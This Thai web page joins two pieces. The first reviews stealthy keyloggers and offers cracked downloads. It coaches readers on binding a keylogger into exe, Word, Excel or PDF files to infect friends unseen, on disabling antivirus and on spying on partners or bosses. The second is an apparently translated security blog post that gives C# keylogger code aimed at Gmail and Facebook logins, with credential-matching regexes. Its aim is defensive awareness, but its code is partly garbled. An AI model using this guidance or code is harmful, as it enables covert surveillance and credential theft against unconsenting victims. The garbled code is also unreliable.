เรามาเริ่มต้นการทบทวนคีย์ล็อกเกอร์หลัก ๆ ที่ผมใช้ในการฝึกฝนประจำวันพร้อมลิงก์สำหรับดาวน์โหลดฟรี เวอร์ชันเต็ม(เช่น ทุกรุ่นเป็นเวอร์ชันล่าสุดในขณะนี้ (ซึ่งสามารถหาวิธีรักษาได้) และมีรอยแตกที่ทำงานและทดสอบแล้ว)

0. หนู!

การให้คะแนน (เต็ม 10):

  • ลักลอบ: 10
  • ความสะดวก/การใช้งาน: 9
  • ฟังก์ชั่น: 8

มันเป็นแค่ระเบิด ไม่ใช่คีย์ล็อกเกอร์! ในสภาพการทำงานจะใช้เวลา 15-20 KB ทำไมต้องแปลกใจ: มันเขียนด้วยภาษาแอสเซมบลีทั้งหมด (โปรแกรมเมอร์รุ่นเก๋าหลั่งน้ำตา) และส่วนใหญ่เขียนโดยแฮกเกอร์ที่กระตือรือร้นเนื่องจากระดับความลับของมันนั้นน่าทึ่งมาก: มันทำงานในระดับเคอร์เนลของระบบปฏิบัติการ!

นอกจากนี้ แพ็คเกจนี้ยังมี FileConnector ซึ่งเป็นมินิโปรแกรมที่ให้คุณเชื่อมต่อคีย์ล็อกเกอร์นี้กับโปรแกรมใดก็ได้ เป็นผลให้คุณได้รับ exe ใหม่ที่มีขนาดเกือบเท่ากัน และเมื่อเปิดตัว มันจะทำงานเหมือนกับโปรแกรมที่คุณรวมเข้าด้วยกันทุกประการ! แต่หลังจากการเปิดตัวครั้งแรก คีย์ล็อกเกอร์ของคุณจะถูกติดตั้งโดยอัตโนมัติในโหมดมองไม่เห็นพร้อมพารามิเตอร์สำหรับส่งบันทึกที่คุณระบุไว้ก่อนหน้านี้ สะดวกไม่ใช่เหรอ?

โอกาสอันดีสำหรับ วิศวกรรมสังคม(นำไฟล์เกม/งานนำเสนอไปให้เพื่อนในแฟลชไดรฟ์ หรือแม้แต่เอกสาร Word (ฉันจะบอกวิธีสร้างไฟล์ exe ที่เรียกใช้ไฟล์ word/excel เฉพาะเจาะจงในบทความถัดไปของฉัน) เปิดตัว ทุกอย่างดีและมหัศจรรย์ แต่เพื่อนติดเชื้ออย่างมองไม่เห็นแล้ว!) หรือคุณเพียงส่งไฟล์นี้ให้เพื่อนทางไปรษณีย์ (ควรเป็นลิงก์สำหรับดาวน์โหลดเนื่องจากเซิร์ฟเวอร์เมลสมัยใหม่ห้ามไม่ให้ส่งไฟล์ exe) แน่นอนว่าระหว่างการติดตั้งยังคงมีความเสี่ยงจากโปรแกรมป้องกันไวรัส (แต่จะไม่มีอยู่หลังการติดตั้ง)

อย่างไรก็ตาม การใช้เทคนิคอื่น ๆ คุณสามารถรวมการกระจายเข้าด้วยกันได้ การติดตั้งที่ซ่อนอยู่(สิ่งเหล่านี้มีอยู่ใน The Rat! และ Elite keylogger) ไม่เพียงแต่กับไฟล์ exe (ซึ่งยังคงสร้างความสงสัยในหมู่ผู้ใช้ขั้นสูงไม่มากก็น้อย) แต่ยังมีไฟล์ word / excel ธรรมดาและแม้แต่ไฟล์ pdf ด้วย! ไม่มีใครจะคิดอะไรเกี่ยวกับไฟล์ pdf ธรรมดา ๆ แต่นั่นไม่เป็นเช่นนั้น! :) วิธีการดำเนินการนี้เป็นหัวข้อของบทความแยกต่างหากทั้งหมด ผู้ที่มีความกระตือรือร้นเป็นพิเศษสามารถเขียนคำถามถึงฉันผ่านแบบฟอร์มคำติชมได้ ;)

โดยรวมแล้วหนู! สามารถอธิบายได้ยาวนานและมาก นี่ทำได้ดีกว่าฉันมาก นอกจากนี้ยังมีลิงค์ดาวน์โหลดที่นั่น

1. คีย์ล็อกเกอร์ชั้นยอด

การให้คะแนน (เต็ม 10):

  • ลักลอบ: 10
  • ความสะดวก/การใช้งาน: 9
  • ฟังก์ชั่น: 8

บางทีหนึ่งในคีย์ล็อกเกอร์ที่ดีที่สุดที่เคยสร้างมา นอกเหนือจากชุดมาตรฐาน (การสกัดกั้นการคลิกทั้งหมดในบริบทของแอปพลิเคชัน / หน้าต่าง / ไซต์) ยังรวมถึงการสกัดกั้นข้อความโต้ตอบแบบทันที รูปภาพจากเว็บแคม และ - ซึ่งสำคัญมาก! - การสกัดกั้นรหัสผ่านบริการ WinLogon กล่าวอีกนัยหนึ่ง มันสกัดกั้นรหัสผ่านเข้าสู่ระบบ Windows (รวมถึงรหัสผ่านโดเมนด้วย!) สิ่งนี้เกิดขึ้นได้เนื่องจากการทำงานในระดับไดรเวอร์ระบบและเปิดใช้งานแม้ในช่วงบูตระบบปฏิบัติการ เนื่องจากคุณสมบัติเดียวกันนี้ โปรแกรมนี้จึงยังคงมองไม่เห็นโดยสมบูรณ์สำหรับทั้ง Kasperosky และซอฟต์แวร์ป้องกันมัลแวร์อื่น ๆ ทั้งหมด จริงๆ แล้วฉันไม่เคยพบกับคีย์ล็อกเกอร์สักคนเดียวที่สามารถทำเช่นนี้ได้

อย่างไรก็ตาม คุณไม่ควรหลอกตัวเองมากเกินไป ตัวติดตั้งนั้นได้รับการยอมรับจากโปรแกรมป้องกันไวรัสอย่างง่ายดาย และในการติดตั้งคุณจะต้องมีสิทธิ์ของผู้ดูแลระบบและปิดการใช้งานบริการป้องกันไวรัสทั้งหมด หลังการติดตั้งทุกอย่างจะทำงานได้อย่างสมบูรณ์ในทุกกรณี

นอกจากนี้ คุณลักษณะที่อธิบายไว้ (ทำงานในระดับเคอร์เนล OS) แนะนำข้อกำหนดสำหรับเวอร์ชันระบบปฏิบัติการที่ตัวบันทึกคีย์จะทำงาน เวอร์ชัน 5-5.3 (ลิงก์ที่ให้ไว้ด้านล่าง) รองรับทุกสิ่งจนถึงและรวมถึง Windows 7 ชนะ 8/10 เช่นกัน ครอบครัวหน้าต่างไม่รองรับเซิร์ฟเวอร์ (2003 / 2008 / 2012) อีกต่อไป มีเวอร์ชัน 6 ซึ่งทำงานได้อย่างสมบูรณ์รวมถึง อย่างไรก็ตาม ใน win 8 และ 10 ขณะนี้ยังไม่สามารถค้นหาเวอร์ชันที่แคร็กได้ มันอาจจะปรากฏขึ้นในอนาคต ในระหว่างนี้ คุณสามารถดาวน์โหลด Elite keylogger 5.3 ได้จากลิงก์ด้านบน

ไม่มีโหมดการทำงานของเครือข่าย จึงไม่เหมาะสำหรับการใช้งานโดยนายจ้าง (เพื่อตรวจสอบคอมพิวเตอร์ของพนักงาน) หรือคนทั้งกลุ่ม

จุดสำคัญคือความสามารถในการสร้างการกระจายการติดตั้งด้วยการตั้งค่าที่กำหนดไว้ล่วงหน้า (เช่น ด้วยที่อยู่อีเมลที่ระบุซึ่งจะต้องส่งบันทึก) ในเวลาเดียวกัน ในตอนท้ายคุณจะได้รับชุดแจกจ่ายซึ่งเมื่อเปิดตัว จะไม่แสดงคำเตือนหรือหน้าต่างใด ๆ เลย และหลังการติดตั้งก็สามารถทำลายตัวเองได้ (หากคุณเลือกตัวเลือกที่เหมาะสม)

ภาพหน้าจอของเวอร์ชัน 5 หลายภาพ (เพื่อแสดงให้เห็นว่าทุกสิ่งสวยงามและสะดวกสบายเพียงใด):

2. คีย์ล็อกเกอร์แบบครบวงจร

การให้คะแนน (เต็ม 10):

  • ชิงทรัพย์: 3
  • ความสะดวก/การใช้งาน: 9
  • ฟังก์ชั่น: 8

นอกจากนี้ยังเป็นสิ่งที่สะดวกมากอีกด้วย ฟังก์ชั่นค่อนข้างอยู่ในระดับ Elite keylogger สิ่งต่าง ๆ แย่ลงด้วยความลับ รหัสผ่าน Winlogon จะไม่ถูกดักจับอีกต่อไป ไม่ใช่ไดรเวอร์ และไม่ได้ติดตั้งอยู่ในเคอร์เนล อย่างไรก็ตาม มีการติดตั้งในระบบและไดเรกทอรี AppData ที่ซ่อนอยู่ซึ่งเข้าถึงได้ไม่ง่ายนัก แก่ผู้ใช้ที่ไม่ได้รับอนุญาต(ไม่ใช่สำหรับผู้ที่ได้รับการติดตั้งในนามของ) อย่างไรก็ตามโปรแกรมป้องกันไวรัสก็ประสบความสำเร็จไม่ช้าก็เร็วซึ่งทำให้สิ่งนี้ไม่น่าเชื่อถือและปลอดภัยเป็นพิเศษเมื่อใช้เช่นในที่ทำงานเพื่อสอดแนมผู้บังคับบัญชาของคุณเอง ;) การติดกาวเข้ากับบางสิ่งบางอย่างหรือเข้ารหัสโค้ดเพื่อซ่อนจากโปรแกรมป้องกันไวรัสจะไม่ทำงาน

ใช้งานได้กับ Win OS ทุกรุ่น (ซึ่งดีและใช้งานได้จริง)

ส่วนที่เหลือทุกอย่างเรียบร้อยดี: บันทึกทุกอย่าง (ยกเว้นรหัสผ่านเข้าสู่ระบบ Windows) ส่งไปทุกที่ (รวมถึงอีเมล, FTP, แฟลชไดรฟ์แบบคงที่) ในเรื่องความสะดวกสบายทุกอย่างยังดีเยี่ยมอีกด้วย

3. สปายเทค สปายเอเจนต์

การให้คะแนน (เต็ม 10):

  • ชิงทรัพย์: 4
  • ความสะดวก/การใช้งาน: 8
  • ฟังก์ชั่น: 10

ยังเป็นคีย์ล็อกเกอร์ที่ดีแม้ว่าจะมีความลับที่น่าสงสัยก็ตาม เวอร์ชันระบบปฏิบัติการที่รองรับก็เป็นไปได้เช่นกัน ฟังก์ชันการทำงานจะคล้ายกับตัวเลือกก่อนหน้า มีฟังก์ชั่นทำลายตัวเองที่น่าสนใจหลังจากผ่านระยะเวลาที่กำหนด (หรือเมื่อถึงวันที่กำหนดไว้)

นอกจากนี้ยังสามารถบันทึกวิดีโอจากเว็บแคมและเสียงจากไมโครโฟนซึ่งเป็นที่นิยมอย่างมากและไม่มีตัวแทนสองคนก่อนหน้านี้

มีโหมดการทำงานเครือข่ายซึ่งสะดวกสำหรับการตรวจสอบเครือข่ายคอมพิวเตอร์ทั้งหมด อย่างไรก็ตาม StaffCop มีมัน (ไม่รวมอยู่ในการตรวจสอบเนื่องจากไม่มีประโยชน์สำหรับผู้ใช้รายเดียว - บุคคล) บางทีโปรแกรมนี้อาจเหมาะสำหรับนายจ้างในการสอดแนมพนักงานของตน (แม้ว่าผู้นำในสาขานี้จะเป็น StaffCop และ LanAgent โดยไม่มีเงื่อนไข - หากคุณเป็นนิติบุคคล อย่าลืมมองไปในทิศทางของพวกเขา) หรือเพื่อติดตามลูกหลานของคุณที่ชอบนั่งดู "ไซต์สำหรับผู้ใหญ่" เหล่านั้น. โดยที่สิ่งที่จำเป็นไม่ใช่การปกปิด แต่เป็นความสะดวกสบาย (รวมถึงรายงานบันทึกที่สวยงามมากมาย ฯลฯ) และฟังก์ชันสำหรับการบล็อกไซต์/โปรแกรมที่ระบุ (SpyAgent ก็มีเช่นกัน)

4. จอภาพส่วนบุคคล Spyrix

การให้คะแนน (เต็ม 10):

  • ชิงทรัพย์: 4
  • ความสะดวก/การใช้งาน: 6
  • ฟังก์ชั่น: 10

ฟังก์ชันการทำงานอยู่ในระดับเดียวกับผู้สมัครก่อนหน้านี้ แต่มีปัญหาเรื่องการรักษาความลับเช่นเดียวกัน นอกจากนี้ฟังก์ชันการทำงานยังรวมถึงสิ่งที่น่าสนใจ: การคัดลอกไฟล์จากไดรฟ์ USB ที่เสียบเข้าไปในคอมพิวเตอร์รวมถึงการดูบันทึกระยะไกลผ่านบัญชีเว็บบนเว็บไซต์ Spyrix (แต่เรากำลังจะดาวน์โหลดเวอร์ชันที่แคร็กดังนั้นมันจะไม่ ทำงานให้เรา)

5. จอภาพส่วนบุคคล Spyrix

การให้คะแนน (เต็ม 10):

  • ชิงทรัพย์: 3
  • ความสะดวก/การใช้งาน: 6
  • ฟังก์ชั่น: 8

ฉันจะไม่อธิบายให้ละเอียดเพราะ... สำเนานี้ไม่มีสิ่งใดที่สายลับคนก่อนไม่มีอย่างไรก็ตามบางคนอาจชอบคีย์ล็อกเกอร์นี้ (อย่างน้อยก็สำหรับอินเทอร์เฟซ)

เราจะจบลงด้วยอะไร?

ปัญหาของการใช้คีย์ล็อกเกอร์นั้นมีจริยธรรมมากกว่าทางเทคนิค และขึ้นอยู่กับเป้าหมายของคุณเป็นอย่างมาก

หากคุณเป็นนายจ้างที่ต้องการควบคุมพนักงานของตน อย่าลังเลที่จะจัดตั้ง StaffCop รวบรวมการอนุญาตเป็นลายลักษณ์อักษรจากพนักงานทุกคนสำหรับการกระทำดังกล่าว (ไม่เช่นนั้นคุณอาจถูกตั้งข้อหาร้ายแรงสำหรับสิ่งเหล่านั้น) และงานก็อยู่ในกระเป๋า แม้ว่าโดยส่วนตัวแล้วฉันจะรู้มากกว่านี้ วิธีที่มีประสิทธิภาพเพิ่มประสิทธิภาพการทำงานของพนักงาน

หากคุณเป็นผู้เชี่ยวชาญด้านไอทีมือใหม่ที่ต้องการสัมผัสประสบการณ์การทำลายใครสักคน และวิธีทำงานโดยทั่วไปของสิ่งนี้ ลองเตรียมตัวเองให้พร้อมด้วยวิธีวิศวกรรมสังคมและทำการทดสอบกับเพื่อนของคุณโดยใช้ตัวอย่างที่ให้มา อย่างไรก็ตาม โปรดจำไว้ว่า การที่เหยื่อตรวจพบกิจกรรมดังกล่าวไม่ได้ส่งผลต่อมิตรภาพและอายุยืนยาว ;) และคุณไม่ควรทดสอบสิ่งนี้ในที่ทำงานของคุณอย่างแน่นอน ทำเครื่องหมายคำพูดของฉัน: ฉันมีประสบการณ์เกี่ยวกับเรื่องนี้ ;)

หากเป้าหมายของคุณคือการสอดแนมเพื่อน สามี เพื่อนบ้าน หรือบางทีคุณอาจทำเป็นประจำและได้เงิน ลองคิดให้รอบคอบว่ามันคุ้มค่าหรือไม่ ท้ายที่สุดแล้วพวกเขาอาจจะดึงดูดไม่ช้าก็เร็ว และมันก็ไม่คุ้มค่า: “การคุ้ยหาเสื้อผ้าสกปรกของคนอื่นไม่ใช่เรื่องน่ายินดี” หากคุณยังคงจำเป็น (หรือบางทีคุณอาจทำงานด้านการสืบสวนอาชญากรรมทางคอมพิวเตอร์และงานดังกล่าวเป็นส่วนหนึ่งของความรับผิดชอบทางวิชาชีพของคุณ) มีเพียงสองตัวเลือกเท่านั้น: The Rat! และอีลิทคีย์ล็อกเกอร์ ในโหมดการกระจายการติดตั้งที่ซ่อนอยู่ติดกาวด้วย word / excel / pdf และจะดีกว่าถ้าเป็นไปได้เข้ารหัสด้วย cryptor ใหม่ เฉพาะในกรณีนี้เท่านั้นที่เราสามารถรับประกันกิจกรรมที่ปลอดภัยและความสำเร็จที่แท้จริงได้

แต่ไม่ว่าในกรณีใด ควรจำไว้ว่าการใช้คีย์ล็อกเกอร์อย่างมีความสามารถเป็นเพียงลิงก์เล็ก ๆ เพียงลิงก์เดียวในการบรรลุเป้าหมาย (รวมถึงการโจมตีแบบธรรมดาด้วย) คุณไม่มีสิทธิ์ของผู้ดูแลระบบเสมอไป คุณไม่สามารถเข้าถึงทางกายภาพได้เสมอไป และไม่ใช่ผู้ใช้ทุกคนที่จะเปิด อ่าน และอื่นๆ อีกมากมาย ดังนั้นให้ดาวน์โหลดไฟล์แนบ/ลิงก์ของคุณ (สวัสดีวิศวกรรมสังคม) โปรแกรมป้องกันไวรัสจะไม่ถูกปิดใช้งานเสมอไป /keylogger/cryptor ของคุณจะไม่เป็นที่รู้จักสำหรับพวกเขาเสมอไป ปัญหาทั้งหมดนี้และปัญหาที่ยังไม่ได้บอกเล่ามากมายสามารถแก้ไขได้ แต่วิธีแก้ไขคือหัวข้อของบทความที่แยกจากกันทั้งชุด

คุณเพิ่งเริ่มกระโจนเข้าสู่สิ่งที่ซับซ้อนอันตราย แต่บ้าคลั่ง โลกที่น่าสนใจ ความปลอดภัยของข้อมูล. :)

ขอแสดงความนับถือ,ลีสยัค เอ.เอส.

โลกของแฮ็กเกอร์สามารถแบ่งกลุ่มผู้โจมตีได้เป็น 3 กลุ่ม:


1) “Skids” (ตัวเขียนสคริปต์) – แฮ็กเกอร์มือใหม่ตัวน้อยที่รวบรวมโค้ดและยูทิลิตี้ที่รู้จักกันดี และใช้พวกมันเพื่อสร้างมัลแวร์ง่ายๆ


2) “ผู้ซื้อ” คือผู้ประกอบการ วัยรุ่น และผู้แสวงหาความตื่นเต้นอื่นๆ ที่ไร้ยางอาย พวกเขาซื้อบริการสำหรับการเขียนซอฟต์แวร์ดังกล่าวบนอินเทอร์เน็ต รวบรวมข้อมูลส่วนบุคคลต่างๆ ด้วยความช่วยเหลือ และอาจขายต่อได้


3) “Black Hat Coders” - ผู้เชี่ยวชาญด้านการเขียนโปรแกรมและผู้เชี่ยวชาญด้านสถาปัตยกรรม พวกเขาเขียนโค้ดลงในแผ่นจดบันทึกและพัฒนาช่องโหว่ใหม่ๆ ตั้งแต่เริ่มต้น


คนที่มีทักษะการเขียนโปรแกรมดีสามารถเป็นคนสุดท้ายได้หรือไม่? ฉันไม่คิดว่าคุณจะเริ่มสร้างบางสิ่งเช่น regin (ลิงก์) หลังจากเข้าร่วมเซสชัน DEFCON สองสามครั้ง ในทางกลับกัน ฉันเชื่อว่าเจ้าหน้าที่รักษาความปลอดภัยข้อมูลควรเชี่ยวชาญแนวคิดบางประการเกี่ยวกับการสร้างมัลแวร์


เหตุใดเจ้าหน้าที่รักษาความปลอดภัยข้อมูลจึงต้องการทักษะที่น่าสงสัยเหล่านี้


รู้จักศัตรูของคุณ ดังที่เราคุยกันในบล็อก Inside Out คุณต้องคิดเหมือนผู้กระทำความผิดเพื่อหยุดเขา ฉันเป็นผู้เชี่ยวชาญด้านความปลอดภัยของข้อมูลที่ Varonis และจากประสบการณ์ของฉัน คุณจะแข็งแกร่งขึ้นในทักษะนี้หากคุณเข้าใจว่าผู้โจมตีจะทำอะไรได้บ้าง ดังนั้นฉันจึงตัดสินใจเริ่มโพสต์ชุดเกี่ยวกับรายละเอียดเบื้องหลังมัลแวร์และเครื่องมือแฮ็กตระกูลต่างๆ เมื่อคุณทราบแล้วว่าการสร้างซอฟต์แวร์ที่ตรวจไม่พบนั้นง่ายเพียงใด คุณอาจต้องการพิจารณานโยบายความปลอดภัยขององค์กรของคุณอีกครั้ง ตอนนี้มีรายละเอียดเพิ่มเติม


สำหรับคลาส "แฮ็ก 101" แบบไม่เป็นทางการนี้ คุณต้องมีความรู้ด้านการเขียนโปรแกรม (C# และ java) และความเข้าใจพื้นฐานเกี่ยวกับสถาปัตยกรรม Windows โปรดทราบว่าในความเป็นจริงแล้วมัลแวร์นั้นเขียนด้วยภาษา C/C++/Delphi เพื่อไม่ให้ขึ้นอยู่กับเฟรมเวิร์ก


คีย์ล็อกเกอร์


คีย์ล็อกเกอร์คือซอฟต์แวร์หรืออุปกรณ์ทางกายภาพบางประเภทที่สามารถสกัดกั้นและจดจำการกดแป้นพิมพ์บนเครื่องที่ถูกบุกรุก นี่ถือได้ว่าเป็นกับดักดิจิทัลสำหรับการกดแป้นพิมพ์ทุกครั้งบนคีย์บอร์ด
บ่อยครั้งที่ฟังก์ชันนี้ถูกนำไปใช้ในซอฟต์แวร์อื่นที่ซับซ้อนกว่า เช่น โทรจัน (โทรจันการเข้าถึงระยะไกล RATS) ซึ่งรับประกันการส่งข้อมูลที่ถูกดักกลับไปยังผู้โจมตี นอกจากนี้ยังมีคีย์ล็อกเกอร์ฮาร์ดแวร์ด้วย แต่พบได้น้อยกว่าเนื่องจาก... ต้องการการเข้าถึงทางกายภาพโดยตรงไปยังเครื่อง


อย่างไรก็ตาม การสร้างฟังก์ชันคีย์ล็อกเกอร์พื้นฐานนั้นค่อนข้างง่ายในการเขียนโปรแกรม คำเตือน. หากคุณต้องการลองดำเนินการใดๆ ต่อไปนี้ ตรวจสอบให้แน่ใจว่าคุณมีสิทธิ์และไม่รบกวนสภาพแวดล้อมที่มีอยู่ และวิธีที่ดีที่สุดคือทำทุกอย่างบน VM ที่แยกออกมา ไกลออกไป, รหัสนี้จะไม่ได้รับการปรับให้เหมาะสม ฉันจะแสดงให้คุณเห็นบรรทัดของโค้ดที่สามารถทำงานให้สำเร็จได้ มันไม่ใช่วิธีที่หรูหราหรือเหมาะสมที่สุด และในที่สุด ฉันจะไม่บอกคุณถึงวิธีทำให้คีย์ล็อกเกอร์ทนต่อการรีบูตหรือพยายามทำให้ตรวจไม่พบโดยสิ้นเชิงโดยใช้เทคนิคการเขียนโปรแกรมพิเศษ รวมถึงการป้องกันการลบแม้ว่าจะตรวจพบก็ตาม



ในการเชื่อมต่อกับคีย์บอร์ด คุณเพียงแค่ต้องใช้ 2 บรรทัดใน C#:


1. 2. 3. สาธารณะคงที่ภายนอก int GetAsyncKeyState (Int32 i);

คุณสามารถเรียนรู้เพิ่มเติมเกี่ยวกับฟังก์ชัน GetAsyncKeyState บน MSDN:


เพื่อทำความเข้าใจ: ฟังก์ชันนี้จะกำหนดว่ามีการกดหรือปล่อยปุ่มในขณะที่โทรหรือไม่ และไม่ว่าจะกดหลังจากการโทรครั้งก่อนหรือไม่ ตอนนี้เราเรียกใช้ฟังก์ชันนี้อย่างต่อเนื่องเพื่อรับข้อมูลจากแป้นพิมพ์:


1. ในขณะที่ (จริง) 2. ( 3. Thread.Sleep(100); 4. สำหรับ (Int32 i = 0; i< 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

เกิดอะไรขึ้นที่นี่? ลูปนี้จะสำรวจแต่ละคีย์ทุกๆ 100 มิลลิวินาทีเพื่อกำหนดสถานะของคีย์ หากมีการกดอันใดอันหนึ่ง (หรือถูกกด) ข้อความเกี่ยวกับสิ่งนี้จะปรากฏบนคอนโซล ในชีวิตจริง ข้อมูลนี้จะถูกบัฟเฟอร์และส่งไปยังผู้โจมตี


คีย์ล็อกเกอร์อัจฉริยะ

เดี๋ยวก่อน มีจุดใดในการพยายามลบข้อมูลทั้งหมดออกจากแอปพลิเคชันทั้งหมดหรือไม่
โค้ดด้านบนดึงอินพุตคีย์บอร์ดดิบจากหน้าต่างและฟิลด์อินพุตใดก็ตามที่มีโฟกัสอยู่ในปัจจุบัน หากเป้าหมายของคุณคือหมายเลขบัตรเครดิตและรหัสผ่าน วิธีการนี้ก็ไม่ค่อยได้ผล สำหรับสถานการณ์ในโลกแห่งความเป็นจริง เมื่อคีย์ล็อกเกอร์ถูกดำเนินการบนเครื่องนับร้อยหรือหลายพันเครื่อง การแยกวิเคราะห์ข้อมูลที่ตามมาอาจใช้เวลานานมากและไร้ความหมายในที่สุด เนื่องจาก ข้อมูลที่มีค่าสำหรับผู้โจมตีอาจล้าสมัยแล้ว


สมมติว่าฉันต้องการได้รับข้อมูลประจำตัวของ Facebook หรือ Gmail เพื่อขายไลค์ แล้ว ความคิดใหม่– เปิดใช้งานคีย์ล็อกเฉพาะเมื่อหน้าต่างเบราว์เซอร์เปิดใช้งานและมีคำว่า Gmail หรือ facebook อยู่ในชื่อหน้า โดยใช้วิธีนี้ ฉันจะเพิ่มโอกาสในการได้รับข้อมูลประจำตัว


รหัสเวอร์ชันที่สอง:


1. while (จริง) 2. ( 3. IntPtr handle = GetForegroundWindow(); 4. if (GetWindowText(handle, buff, chars) > 0) 5. ( 6. string line = buff.ToString(); 7. if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up")) 8. ( 9. //keyboard check 10. ) 11. ) 12. Thread.Sleep(100); 13. )

ตัวอย่างนี้จะตรวจจับหน้าต่างที่ใช้งานอยู่ทุกๆ 100 มิลลิวินาที ซึ่งทำได้โดยใช้ฟังก์ชัน GetForegroundWindow (ข้อมูลเพิ่มเติมเกี่ยวกับ MSDN) ชื่อเพจถูกจัดเก็บไว้ในตัวแปรบัฟ หากมี Gmail หรือ Facebook ระบบจะเรียกส่วนการสแกนแป้นพิมพ์


ด้วยการทำเช่นนี้ เรามั่นใจว่าแป้นพิมพ์จะถูกสแกนเฉพาะเมื่อหน้าต่างเบราว์เซอร์เปิดบนไซต์ Facebook และ Gmail เท่านั้น


คีย์ล็อกเกอร์ที่ชาญฉลาดยิ่งขึ้น


สมมติว่าผู้โจมตีสามารถรับข้อมูลโดยใช้รหัสที่คล้ายกับของเรา สมมติว่าเขามีความทะเยอทะยานมากพอที่จะแพร่เชื้อไปยังเครื่องจักรหลายหมื่นหรือหลายแสนเครื่อง ผลลัพธ์: ไฟล์ขนาดใหญ่ที่มีข้อความกิกะไบต์ซึ่งยังต้องการข้อมูลที่จำเป็น ถึงเวลาทำความคุ้นเคยกับนิพจน์ทั่วไปหรือ regex แล้ว นี่เป็นสิ่งที่เหมือนกับภาษาเล็กๆ สำหรับการสร้างเทมเพลตและการสแกนข้อความเพื่อให้สอดคล้องกับเทมเพลตที่กำหนด คุณสามารถหาข้อมูลเพิ่มเติมได้ที่นี่


เพื่อให้ง่ายขึ้น ฉันจะให้นิพจน์สำเร็จรูปที่สอดคล้องกับชื่อเข้าสู่ระบบและรหัสผ่านทันที:


1. //ค้นหาที่อยู่ทางไปรษณีย์ 2. ^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* + \-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) ( 3)(1,3)))$ 3. 4. 5. //กำลังหารหัสผ่าน 6. (?=^.(6,)$)(?=.*\d)(?=.*)

สำนวนเหล่านี้เป็นเพียงคำแนะนำว่าสามารถใช้สำนวนเหล่านี้ทำอะไรได้บ้าง ด้วยการใช้นิพจน์ทั่วไป คุณสามารถค้นหา (และค้นหา!) โครงสร้างใดๆ ที่มีรูปแบบเฉพาะและไม่เปลี่ยนแปลง เช่น หมายเลขหนังสือเดินทาง บัตรเครดิต บัญชีและแม้กระทั่งรหัสผ่าน
จริงหรือ, การแสดงออกปกติไม่ใช่โค้ดประเภทที่อ่านง่ายที่สุด แต่เป็นหนึ่งในเพื่อนที่ดีที่สุดของโปรแกรมเมอร์หากมีงานแยกวิเคราะห์ข้อความ Java, C#, JavaScript และภาษายอดนิยมอื่น ๆ มีฟังก์ชันสำเร็จรูปซึ่งคุณสามารถส่งนิพจน์ทั่วไปได้


สำหรับ C# ดูเหมือนว่านี้:


1. Regex ใหม่ = Regex ใหม่(@"^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* +\-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) (3)(1,3)))$"); 2. Regex re2 = Regex ใหม่(@"(?=^.(6,)$)(?=.*\d)(?=.*)"); 3. สตริงอีเมล = " [ป้องกันอีเมล]"; 4. string pass = "abcde3FG"; 5. Match result = re.Match(email); 6. Match result2 = re2.Match(pass);

โดยที่นิพจน์แรก (re) จะตรงกับนิพจน์ใดๆ อีเมลและตัวที่สอง (re2) คือโครงสร้างตัวอักษรและตัวเลขใดๆ ที่ยาวเกิน 6 อักขระ


ฟรีและตรวจไม่พบอย่างสมบูรณ์


ในตัวอย่างของฉัน ฉันใช้ Visual Studio - คุณสามารถใช้สภาพแวดล้อมที่คุณชื่นชอบ - เพื่อสร้างคีย์ล็อกเกอร์ดังกล่าวได้ภายใน 30 นาที
ถ้าฉันเป็นผู้โจมตีจริง ฉันจะมุ่งเป้าไปที่เป้าหมายที่แท้จริง (ไซต์ธนาคาร โซเชียลเน็ตเวิร์ก ฯลฯ) และแก้ไขโค้ดให้ตรงกับเป้าหมายเหล่านี้ แน่นอนว่าฉันก็จะเปิดตัวแคมเปญฟิชชิ่งด้วย โดยอีเมลด้วยโปรแกรมของเราภายใต้หน้ากากของบัญชีปกติหรือการลงทุนอื่น ๆ


คำถามหนึ่งยังคงอยู่: โปรแกรมรักษาความปลอดภัยตรวจไม่พบซอฟต์แวร์ดังกล่าวหรือไม่


ฉันรวบรวมโค้ดและตรวจสอบไฟล์ exe บนเว็บไซต์ Virustotal นี่คือเครื่องมือเว็บที่คำนวณแฮชของไฟล์ที่คุณอัปโหลดและค้นหาในฐานข้อมูล ไวรัสที่รู้จัก. เซอร์ไพรส์! โดยธรรมชาติแล้วไม่พบอะไรเลย



นี่คือประเด็นหลัก! คุณสามารถเปลี่ยนโค้ดและพัฒนาได้ตลอดเวลา โดยนำหน้าเครื่องสแกนภัยคุกคามอยู่เสมอ หากคุณสามารถเขียนโค้ดของคุณเองได้ ก็แทบจะรับประกันได้ว่าตรวจไม่พบ คุณสามารถอ่านบทวิเคราะห์ฉบับเต็มได้ในหน้านี้


วัตถุประสงค์หลักของบทความนี้คือเพื่อแสดงให้เห็นว่าการใช้โปรแกรมป้องกันไวรัสเพียงอย่างเดียว คุณจะไม่สามารถรับประกันความปลอดภัยในองค์กรของคุณได้อย่างเต็มที่ จำเป็นต้องมีการประเมินการกระทำของผู้ใช้ทั้งหมดและแม้แต่บริการในเชิงลึกมากขึ้นเพื่อระบุการกระทำที่อาจเป็นอันตราย


ในบทความถัดไป ฉันจะแสดงวิธีสร้างซอฟต์แวร์ดังกล่าวในเวอร์ชันที่ตรวจไม่พบอย่างแท้จริง